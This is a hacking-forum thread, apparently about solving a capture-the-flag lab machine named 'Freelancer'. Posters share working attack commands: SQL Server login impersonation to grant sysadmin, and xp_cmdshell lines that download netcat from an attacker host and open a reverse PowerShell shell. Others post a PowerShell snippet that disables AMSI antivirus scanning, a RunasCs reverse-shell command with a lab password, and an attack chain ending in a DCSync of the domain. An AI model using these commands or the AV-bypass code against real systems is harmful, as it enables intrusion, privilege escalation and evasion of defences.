Posts: 44
Threads: 0
Joined: Apr 2024
(Jun 02, 2024, 09:20 AM)ritualist Wrote: (Jun 02, 2024, 09:07 AM)xss_02 Wrote: (Jun 02, 2024, 07:50 AM)ritualist Wrote: For those stuck in the SQL Terminal, you can impersonate SA
https://book.hacktricks.xyz/network-serv...ther-users
Use this to make yourself sysadmin, then you have the rights to enable adv options and the shell command.
EXECUTE AS LOGIN = 'SA'
EXEC sp_addsrvrolemember 'Freelancer_webapp_user', 'sysadmin'
how to evade AV?
As mentioned previously, you can use nc
xp_cmdshell 'echo IWR http://10.10.X.X/nc.exe -OutFile %TEMP%\nc.exe | powershell -noprofile'
xp_cmdshell '%TEMP%\nc.exe 10.10.X.X 4242 -e powershell'
Can anyone share a hint on what to do after getting sql_svc shell? Tried BloodHound and some basic enumeration and pw spraying, but no success.
what nc.exe did you use? the one from kali (/usr/share/windows-resources/binaries) is detected This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Posts: 15
Threads: 0
Joined: May 2024
(Jun 02, 2024, 10:04 AM)nomx1337 Wrote: (Jun 02, 2024, 09:20 AM)ritualist Wrote: (Jun 02, 2024, 09:07 AM)xss_02 Wrote: (Jun 02, 2024, 07:50 AM)ritualist Wrote: For those stuck in the SQL Terminal, you can impersonate SA
https://book.hacktricks.xyz/network-serv...ther-users
Use this to make yourself sysadmin, then you have the rights to enable adv options and the shell command.
EXECUTE AS LOGIN = 'SA'
EXEC sp_addsrvrolemember 'Freelancer_webapp_user', 'sysadmin'
how to evade AV?
As mentioned previously, you can use nc
xp_cmdshell 'echo IWR http://10.10.X.X/nc.exe -OutFile %TEMP%\nc.exe | powershell -noprofile'
xp_cmdshell '%TEMP%\nc.exe 10.10.X.X 4242 -e powershell'
Can anyone share a hint on what to do after getting sql_svc shell? Tried BloodHound and some basic enumeration and pw spraying, but no success.
what nc.exe did you use? the one from kali (/usr/share/windows-resources/binaries) is detected
Try this one https://packetstormsecurity.com/files/31140/nc.exe.html
Posts: 19
Threads: 0
Joined: Aug 2023
bypass that fcking AV:
$a = [Ref].Assembly.GetTypes() | ?{$_.Name -like '*siUtils'}
$b = $a.GetFields('NonPublic,Static') | ?{$_.Name -like '*siContext'}
[IntPtr]$c = $b.GetValue($null)
[Int32[]]$d = @(0xff)
[System.Runtime.InteropServices.Marshal]::Copy($d, 0, $c, 1)
Posts: 9
Threads: 1
Joined: Apr 2024
can someone do a summary ?
Posts: 19
Threads: 0
Joined: Aug 2023
Jun 02, 2024, 02:41 PM
(This post was last modified: Jun 02, 2024, 02:45 PM by meoami.)
webpage -> employer-> admin-> sql_rce-> sql_svc-> mikasa shell-> lorra199 --> AD Recycle Bin --> Generic Write to DC --> Dcsync to Domain ->root
Posts: 55
Threads: 4
Joined: Apr 2024
(Jun 02, 2024, 02:41 PM)meoami Wrote: webpage -> employer-> admin-> sql_rce-> sql_svc-> mikasa shell-> lorra199 --> AD Recycle Bin --> Generic Write to DC --> Dcsync to Domain ->root
any hint for mikasa shell ?
Posts: 19
Threads: 0
Joined: Aug 2023
There's mikasa password in
C:\Users\sql_svc\Downloads\SQLEXPR-2019_x64_ENU> type sql-Configuration.INI
upload runascs to gain mikasa shell
./RunasCs.exe mikasaAckerman IL0v3ErenY3ager powershell -r IP  ORT
Posts: 19
Threads: 0
Joined: Aug 2023
Jun 02, 2024, 03:08 PM
(This post was last modified: Jun 02, 2024, 03:10 PM by meoami.)
https://github[.]com/ufrisk/MemProcFS
this may be useful then try bypass AMSI and dump something
Posts: 28
Threads: 1
Joined: Dec 2023
im stuck with the passwords from the memory dump but cant seem to get a shell with either password that came out of it. how do I get a shell using these? i think the password isnt the exact same as either of these.
Posts: 3
Threads: 0
Joined: Jun 2024
(Jun 02, 2024, 06:36 AM)xss_02 Wrote: (Jun 02, 2024, 05:33 AM)jj00 Wrote: I'm not able to get port 80! any idea what is blocking ?
change vpn to EU - Release arena
that worked like a charm! thanks 
|
